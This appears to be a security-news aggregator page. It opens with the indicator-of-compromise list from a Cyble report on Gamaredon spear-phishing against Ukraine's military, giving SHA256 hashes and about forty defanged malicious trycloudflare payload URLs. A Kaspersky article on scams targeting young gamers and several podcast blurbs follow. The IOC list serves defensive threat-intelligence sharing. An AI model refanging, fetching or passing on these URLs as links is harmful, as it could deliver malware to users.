XHTML

37c7adb7a719ec99c54b86faad0a2e5164599f0b85ecbc07683b89da0355c655
SHA256
XHTML

efceb2cb0d0a332a630c04a8bce6f0e5dedd297ce7c0943f3783ee0749342ef3
SHA256
XHTML

ce040948011f0ccc9309ab2cb08c7a80bf0337415818cf916e6e2e7ed70ed49e
SHA256
XHTML

5938c03b725f37f68ebf950edf4fd5688900e273ee0a55c305ff4fd9995d03b1
SHA256
XHTML

112bd0f71522e05c21ad249a20534fb8d3306a73f5c39dd44bfb9e198a96e9f8
SHA256
XHTML

cbfe9331e8a1b36f8e5be68f6588a6a116dfd63b474fcac618bc75854535e699
SHA256
XHTML

c449c4be65021a4563da97ae4f150bed4f388236031d33e17953b7d6666381e1
SHA256
XHTML

6c1e4a444e40b27db722be2321eb1c69455251940b30f0e2232103015b7af3cc
SHA256
XHTML

11b0f2bbb811f42dd463c247401fddd9c2efb2708b9be142573597ee869da29a
SHA256
XHTML

7c2bbaaa90b7f66b9ccfb3136905e8d07d8c8f1542aa605844319992a39133c9
SHA256
XHTML

982dac7a43329d6e204e74d87d60c08e94ba3a46ccf36445b218b86f05e44a90
SHA256
XHTML

5a70f39a3d87469146b0a8a92086675dc15e483aa412a0a9aa5dc9809bf8f22f
SHA256
XHTML

663c6f08b3aedb4323e0f73cab526ddcc1f6de53ea7084712940c1cb54d75ab0
SHA256
XHTML

hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/preservation/selected[.]rar
URL
Malicious URL

hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/seeing/prayers[.]rar
URL
Malicious URL

hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/regular/presence[.]tar
URL
Malicious URL

hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/preceding/baron[.]tar
URL
Malicious URL

hxxps://tracked–radar-ni[.]trycloudflare[.]com/zgur/sensation/headstone[.]rar
URL
Malicious URL

hxxps://cod-identification-imported-carl[.]trycloudflare[.]com/f/precaution[.]rtf
URL
Malicious URL

hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/senior/refuge[.]tar
URL
Malicious URL

hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/gss/quest/presents[.]tar
URL
Malicious URL

hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/decide/barn[.]tar
URL
Malicious URL

hxxps://molecular-throw-process-dealtime[.]trycloudflare[.]com/gss/quietly/seller[.]tar
URL
Malicious URL

hxxps://tracked–radar-ni[.]trycloudflare[.]com/zgur/questions/preponderant[.]rar
URL
Malicious URL

hxxps://tracked–radar-ni[.]trycloudflare[.]com/psvr/decay/barefooted[.]rar
URL
Malicious URL

hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/psvr/rejoined/net[.]rar
URL
Malicious URL

hxxps://sunrise-massive-joseph-commodities[.]trycloudflare[.]com/zsvr/sentiment/banisters[.]rar
URL
Malicious URL

hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/growth/days[.]tar
URL
Malicious URL

hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/intake/bargain[.]tar
URL
Malicious URL

hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/bargain/barton[.]tar
URL
Malicious URL

hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcul/based/guarded[.]tar
URL
Malicious URL

hxxps://tracked–radar-ni[.]trycloudflare[.]com/sudu/insufficient/neutral[.]rar
URL
Malicious URL

hxxps://tracked–radar-ni[.]trycloudflare[.]com/sudu/decide/quest[.]rar
URL
Malicious URL

hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vo/nervous/bar[.]tar
URL
Malicious URL

hxxps://bush-worcester-houses-statements[.]trycloudflare[.]com/sudu/headlong/headache[.]rar
URL
Malicious URL

hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/lost/net[.]tar
URL
Malicious URL

hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vomr/regards/bananas[.]tar
URL
Malicious URL

hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vg/relax/quickly[.]tar
URL
Malicious URL

hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/preparations/sequel[.]tar
URL
Malicious URL

hxxps://charter-blond-desired-promptly[.]trycloudflare[.]com/gmm/base/guarantee[.]tar
URL
Malicious URL

hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/heap/September[.]tar
URL
Malicious URL

hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/grow/precaution[.]tar
URL
Malicious URL

hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcg/instruct/instructor[.]tar
URL
Malicious URL

hxxps://axxribute-homework-generator-lovers[.]trycloudflare[.]com/onp/decent2/decent[.]tar
URL
Malicious URL

hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcu/headphones/bananas[.]tar
URL
Malicious URL

hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/insurance/predicate[.]tar
URL
Malicious URL

hxxps://mind-apple-slightly-twiki[.]trycloudflare[.]com/ug/daytime2/daytime[.]tar
URL
Malicious URL

hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/quick/prediction[.]tar
URL
Malicious URL

hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/seeming/quay[.]tar
URL
Malicious URL

hxxps://longitude-powerpoint-geek-upgrade[.]trycloudflare[.]com/sg/precision2/precision[.]tar
URL
Malicious URL

hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/regions/headmaster[.]tar
URL
Malicious URL

The post Spear-Phishing in the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s Military appeared first on Cyble.

Blog – Cyble – ​Read More

ESET Research Podcast: HotPage

/in

ESET researchers discuss HotPage, a recently discovered adware armed with a highest-privilege, yet vulnerable, Microsoft-signed driver

WeLiveSecurity – ​Read More

The key considerations for cyber insurance: A pragmatic approach

/in

Would a more robust cybersecurity posture impact premium costs? Does the policy offer legal cover? These are some of the questions organizations should consider when reviewing their cyber insurance options

WeLiveSecurity – ​Read More

In plain sight: Malicious ads hiding in search results

/in

Sometimes there’s more than just an enticing product offer hiding behind an ad

WeLiveSecurity – ​Read More

Bitcoin ATM scams skyrocket – Week in security with Tony Anscombe

/in

The schemes disproportionately victimize senior citizens, as those aged 60 or over were more than three times as likely as younger adults to fall prey to the scams

WeLiveSecurity – ​Read More

How cybercriminals attack young gamers: the most common and dangerous scams | Kaspersky official blog

/in

The new school year brings with it new hopes, new subjects, new friends… and new (and not-so-new) video games. After the long summer break, it’s natural for kids to dive back into the cyberworld. When school’s in, there’s less time for hanging out with friends at the mall, so the digital space becomes the preferred meet-up place, including, of course, video games.

But the world of gaming isn’t quite as buddy-buddy as might seem at first glance, so here too cybersecurity is a must. Sure, the games themselves are (mostly) fine — the problem is the parasite scammers and cybercriminals they attract.

Kaspersky experts have dug deep to find out which games and players are most at risk, and what to do about it. See the full version of our report for answers to these, and other related questions.

Attackers love Minecraft

To fathom the threatscape facing young gamers, our experts analyzed statistics from the global Kaspersky Security Network (KSN). KSN collects huge amounts of anonymous cyberthreat intelligence data that we receive from users on a voluntary basis.

Selecting the most popular kids’ games for the study, we found the top four most-attacked titles from July 2023–July 2024 were Minecraft, Roblox, Among Us and Brawl Stars.

Game name
Number of attack attempts

Minecraft
3,094,057

Roblox
1,649,745

Among Us
945,571

Brawl Stars
309,554

Five Nights at Freddy’s
219,033

Fortnite
165,859

Angry Birds
66,754

The Legend of Zelda
33,774

Toca Life World
28,360

Valorant
28,119

Mario Kart
14,682

Subway Surfers
14,254

Overwatch 2
9,076

Animal Crossing
8,262

Apex Legend
8,133

That’s right, more than three million attack attempts on Minecraft alone! Almost twice more than on second-place Roblox. Why? Because so many players are looking to download mods and cheats for Minecraft, and these often turn out to be malicious apps.

As for the types of threats being spread, the most common are downloaders, adware, Trojans and backdoors. For several years now, malware downloaders have been the most live threat to the gaming industry — downloaders that tout themselves as the “best Minecraft modloader you can get” often turn out to download… backdoors, Trojans and other threats.

Popular phishing scams

While it’s easy to teach your kids to download apps only from trusted sources and use security solutions, keeping them safe from phishing is more of a challenge. Here, it pays to keep your ears and eyes sharp: the more you and your kids know and read about new scams, the better placed you are to spot them. What’s more, most gaming scams tend to follow a pattern.

Free skins

Pretty much every top kids’ game these days allows (or encourages) players to customize their character with skins that can cost serious money — millions of dollars in some cases! Most kids, of course, don’t have that kind of cash under the bed, so they’re always on the lookout for flashy item giveaways.

One such act of “generosity” was uncovered by our experts. The scammers craftily exploited two things close to young gamer hearts: Valorant and MrBeast. The first is a popular shooter game, while the other is one of the world’s most successful YouTubers, with a 300 million+ subscriber base – mostly kids.

MrBeast and the makers of Valorant probably have no idea about their skin giveaway collaboration on a scam website

The scammers invite gamers to log in to the phishing site using their game account credentials and then to open a treasure chest. Of course, there is no treasure — only a hijacked account.

Free in-game currency

Most in-game economies are built on two kinds of in-game currency: soft and hard. Soft currency is usually earned through playing the game; hard or premium currency is bought with real-world money. Naturally, it’s the latter that attracts cybercriminals.

For example, one scam asks Pokémon GO players to enter their game account username. That is followed by an “I’m not a bot” verification, after which the player lands on a site promising free in-game currency.

Catchy phishing site targeting young Pokémon GO players

Such calls to action are a ruse to redirect users to a far more serious scam, where not only gaming accounts are at stake, but highly sensitive data like bank details.

Reward for in-game actions

“Do such_and_such and win a prize!” is a standard cybercriminal trick. We unearthed such a scam on a Roblox-related phishing site: victims were offered a US$100 Walmart gift card, the same amount for Taco Bell fast food outlets, and, for the especially greedy, US$25,000 in cash. But there’s a catch: first your payment details, please!

Curious reward lineup: a US$100 voucher alongside US$25,000 in cash

Since the youngest gamers don’t yet have payment details of their own, they’ll probably feed their parents’ bank card numbers to the hungry site. And you can only imagine mom and dad’s delight when the next billing statement arrives.

How young gamers can stay safe

Kids often lack basic cybersecurity skills, so can easily fall into cybercriminal traps for example, when trying to download a free game, a mod or a ‘must-have’ skin. That’s why teaching kids cyber hygiene is one of the most important missions of modern parenting.

Help your child think up a unique strong password, and get them used to using a password manager at an early age.
Tell your child about the risks they might face online.
Our Kaspersky Cybersecurity Alphabet is a fun and informative way to teach your kids about new technologies and basic cyber hygiene, and refresh your own knowledge at the same time.
Install reliable protection for gamers on all devices.
Be in the swim of the latest scams in the gaming world and warn your kids what to watch out for.
Use special apps to keep your kids safe — both online and offline.

For more great security tips for young gamers, check out the full version of our report.

Kaspersky official blog – ​Read More

Transatlantic Cable podcast episode 362 | Kaspersky official blog

/in

Episode 362 of the Kaspersky podcast kicks off with discussion around Brazil’s controversial decision to ban Elon Musk’s X platform. From there the team discuss a story from the BBC around the theft of a voice actors voice, which was used on an A.I platform.

To wrap up the team discuss how scammers are looking to use sextortion tactics in order for you to cough up bitcoin and Apple’s big problem around ‘face swap’ apps and pornography.

If you like what you heard, please consider subscribing.

Top Brazil court upholds ban of Musk’s X
A tech firm stole our voices – then cloned and sold them
Sextortion Scammers Try to Scare People by Sending Photos of Their Homes
Apple’s Huge “Dual Use” Face Swap App Problem Is Not Going Away

Kaspersky official blog – ​Read More